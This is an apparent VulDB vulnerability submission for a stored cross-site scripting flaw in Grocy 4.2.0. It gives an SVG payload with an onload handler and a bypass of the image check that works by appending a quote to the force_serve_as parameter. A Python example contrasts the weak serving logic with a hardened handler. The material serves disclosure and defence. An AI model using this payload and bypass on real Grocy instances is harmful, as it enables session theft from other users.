Submission #400844: Grocy 4.2.0 Authenticated Stored Cross-Site Scripting via Break of Control

Title: Grocy 4.2.0 Authenticated Stored Cross-Site Scripting via Break of Control
Description: When authenticated, an operator can bypass the image validation mechanisms and successfully upload a stored Cross-Site Scripting (XSS) payload within the application. This vulnerability allows the operator to steal other users' sessions by tricking them into clicking the stored link.

PoC:

1. Access the "Recipes" menu;
2. Add a new recipe by clicking on "Add" and fill in the inputs with any values;
3. After adding, an "Edit recipe" page will open. On this page, under the "Picture" section, upload a file containing the following content:

   <?xml version="1.0" standalone="no"?>
   <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
   <svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg">
   <defs><font id="x"><font-face font-family="y"/></font></defs>
   </svg>

4. When you review the Burp history, you will find a request like this after uploading the SVG file:

   GET /api/files/recipepictures/(base64...)?force_serve_as=picture&best_fit_width=400

   The response to this request is an error indicating that the image is not valid:

   404 Not Found - {"error_message":"Unsupported image type"}

5. Manipulate the "force_serve_as=picture" parameter to: "force_serve_as=picture' ". The single quote breaks the parameter, allowing you to bypass the validation.
6. By copying the URL http://localhost:9283/api/files/recipepictures/(base64)?force_serve_as=picture'&best_fit_width=400, you can successfully trigger the stored Cross-Site Scripting (XSS) attack.
Source: https://github.com/grocy/grocy
User: Stux (UID 40142)
Submitted: 31/08/2024 20:26 (2 years ago)
Moderated: 01/09/2024 15:42 (19 hours later)
Status: Accepted
VulDB entry: 276274 [Grocy up to 4.2.0 SVG File Upload recipepictures force_serve_as cross site scripting]
Points: 20
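The bypass in the report turns on the server checking force_serve_as with an exact comparison and otherwise falling through to serving the raw file inline. The following is an added example, not Grocy's code: a small Python model of that weak pattern beside a hardened handler that allowlists the parameter, rejects anything else, and never renders a non-raster upload inline. The function names, the Response model and the sample bytes are assumptions; only the parameter name and the error message come from the report.

```python
from dataclasses import dataclass

# Constructed sample inputs: a PNG header stub and a minimal SVG carrying an event handler.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SVG_SAMPLE = b'<?xml version="1.0"?><svg onload="alert(1)" xmlns="http://www.w3.org/2000/svg"/>'

UNSUPPORTED = b'{"error_message":"Unsupported image type"}'  # error text quoted in the report
ALLOWED_MODES = {"picture"}                                    # every accepted force_serve_as value

@dataclass
class Response:
    status: int
    headers: dict
    body: bytes = b""

def detect_raster_type(data: bytes):
    """Identify a raster image by magic bytes; None means 'not a supported image type'."""
    if data.startswith(b"\x89PNG\r\n\x1a\n"):
        return "image/png"
    if data.startswith(b"\xff\xd8\xff"):
        return "image/jpeg"
    if data.startswith((b"GIF87a", b"GIF89a")):
        return "image/gif"
    return None

def serve_weak(force_serve_as, data: bytes) -> Response:
    """Weak pattern (assumed, modelled on the report): the image check runs only when the
    parameter equals 'picture' exactly, so "picture'" skips it and the raw SVG is served inline."""
    if force_serve_as == "picture":
        mime = detect_raster_type(data)
        if mime is None:
            return Response(404, {"Content-Type": "application/json"}, UNSUPPORTED)
        return Response(200, {"Content-Type": mime}, data)
    # Fall-through: content type taken from the file itself, so an SVG renders as a document.
    guessed = "image/svg+xml" if data.lstrip().startswith((b"<?xml", b"<svg")) else "application/octet-stream"
    return Response(200, {"Content-Type": guessed}, data)

def serve_hardened(force_serve_as, data: bytes) -> Response:
    """Hardened: reject unknown parameter values instead of falling through, and never
    render a non-raster file inline (attachment + nosniff), whatever the parameter says."""
    if force_serve_as is not None and force_serve_as not in ALLOWED_MODES:
        return Response(400, {"Content-Type": "application/json"}, b'{"error_message":"Invalid force_serve_as"}')
    mime = detect_raster_type(data)
    if force_serve_as == "picture":
        if mime is None:
            return Response(404, {"Content-Type": "application/json"}, UNSUPPORTED)
        return Response(200, {"Content-Type": mime, "X-Content-Type-Options": "nosniff"}, data)
    return Response(200, {"Content-Type": "application/octet-stream",
                          "Content-Disposition": 'attachment; filename="file.bin"',
                          "X-Content-Type-Options": "nosniff"}, data)
```

Rejecting SVG (and any other non-raster type) at upload time closes the same hole one layer earlier; the serving-side checks above are the defence when an unexpected file is already stored.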
